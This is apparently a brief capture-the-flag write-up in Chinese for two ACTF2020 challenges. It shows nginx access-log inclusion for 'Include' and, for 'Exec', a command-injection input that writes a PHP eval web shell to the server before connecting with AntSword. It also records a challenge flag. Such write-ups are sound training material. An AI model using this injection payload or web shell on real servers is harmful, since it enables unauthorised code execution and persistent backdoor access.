-
[ACTF2020 新生赛]Include
- 因为前端过滤的太多了 所以直接使用 日志包含 搞 包含这个 /var/log/nginx/access.log

- [ACTF2020 新生赛]Include
- 蚁剑连接

- 翻看

- flag{1ce7a81e-0339-44ef-a398-a7784d3efe37}
-
[ACTF2020 新生赛]Exec
- [ACTF2020 新生赛]Exec

- 127.0.0.1 |echo '<?php eval($_POST['a']);?>' > ./1.php

- 配合上传文件
- 蚁剑进行连接

-
